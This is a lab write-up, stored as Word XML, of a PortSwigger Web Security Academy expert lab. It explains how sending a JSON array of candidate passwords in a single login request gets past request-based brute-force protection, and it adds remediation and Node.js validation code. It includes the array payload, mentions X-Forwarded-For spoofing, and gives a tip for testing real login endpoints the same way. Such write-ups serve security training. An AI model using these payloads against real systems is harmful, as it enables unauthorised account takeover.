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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Expert Lab Write-Up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Broken Brute-Force Protection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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple Credentials per Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4"/>
        </w:pBd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Author: Neelesh Pandey  |  Platform: PortSwigger Web Security Academy  |  Difficulty: Expert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 / Brute-Force Protection Bypass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accepted in password field — all candidates in one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Requests Sent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— single manually crafted request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Tools Required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Burp Repeater only — no Intruder, no scripts, no extensions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Success Indicator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 302 on single request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1. THE VULNERABILITY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Normal login request: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"username": "carlos",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"password": "password123"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Exploited login request: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"username": "carlos",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"password": [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"123456",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"password",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"qwerty",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"letmein",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...all candidate passwords...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server accepts a JSON array for the password field and checks each value. If any matches, authentication succeeds — all in a single HTTP request. Rate limiting never triggers because the counter increments by exactly 1.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Rate limit counter after this attack: 1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Passwords tested:                     100+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Result:                               Authenticated as carlos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2. WHY RATE LIMITING FAILS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Brute-force protection counts requests — not password attempts within a request. The fundamental assumption is one password per request. A JSON array breaks this assumption entirely.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0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Passwords per request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Total requests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Protection result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Normal brute-force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requests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Blocked at request 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Array attack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 passwords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request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blocked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3. EXPLOITATION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 — Identify JSON format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Intercepted POST /login in Burp Proxy. Content-Type: application/json confirmed — JSON format means arrays are syntactically valid.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 — Build array payload in Repeater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/login HTTP/2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Host: &lt;lab-id&gt;.web-security-academy.net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Content-Type: application/json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"username": "carlos",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"password": [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"123456",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"password",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"12345678",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"qwerty",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"123456789",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"12345",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"1234",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"111111",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"dragon",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"letmein",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...all remaining candidates...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]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 — Send single request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One request sent from Burp Repeater. Response: HTTP 302 — authentication succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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 — Load response in browser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Right-click → Show response in browser → copy URL → load in browser. Logged in as carlos → account page → lab solved.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4. ATTACK FLOW SUMMARY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POST /login uses JSON format identified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Single password string replaced with array of all candidates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One HTTP request sent → server iterates through array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Matching password found → HTTP 302 returned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    ↓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Response loaded in browser → logged in as carlos → solved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5. COMPARISON — THREE AUTHENTICATION BYPASS TECHNIQUES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1500"/>
        <w:gridCol w:w="1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Lab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Requests Sent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 Block Bypass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Interleave valid credentials every 2 attempts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Timing Enumeration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X-Forwarded-For spoofing + timing analysis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100+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Multiple Credentials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JSON array in single request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Low — single manual request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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6.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 arrays bypass request-based rate limiting — protection counting requests is useless when one request contains unlimited attempts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Content type determines attack surface — JSON endpoints have fundamentally different attack surface to form-encoded; always check Content-Type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automation needed — single manually crafted request; no Intruder, no scripts, no extensions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Rate limiting must count attempts not requests — server must validate password is a scalar string, not a collection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Expert does not always mean complex — this Expert lab is simpler than the Practitioner IP block lab; difficulty reflects subtlety of the flaw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JSON type validation is a security concern — accepting array where string is expected is type confusion in authentication logic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7. REAL-WORLD TESTING TIP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 bug bounty, always test JSON login endpoints by replacing string values with arrays — takes 30 seconds in Burp Repeater and can bypass all rate limiting in a single request. Check these scenarios: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password string with array: "password": ["pwd1", "pwd2", ...]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username string with array: "username": ["admin", "administrator", "root"]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Replace both with arrays simultaneously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Try nested objects inside arrays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="28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8. REMEDIATION</w:t>
      </w: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Password field accepts JSON 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Validate password is a string scalar — reject arrays, objects, or any non-string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limiting counts requests not attempts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Count authentication attempts per credential, not per HTTP request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JSON schema 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strict schema — define expected types for all auth fields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Single request bypasses all protection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Critical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Rate limit at credential level — flag accounts regardless of request count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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Secure server-side validation (Node.js):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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app.post('/login', (req, res) =&gt;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const { username, password } = req.body;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Reject if password is not a plain string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if (typeof password !== 'string') {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  return res.status(400).json({ error: 'Invalid input' });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}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/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// Proceed with authentication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  authenticate(username, password);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space="4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Neelesh Pandey  |  github.com/Neelesh707  |  linkedin.com/in/neelesh-pandey021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2026-04-13T02:22:56.463Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-13T02:22:56.464Z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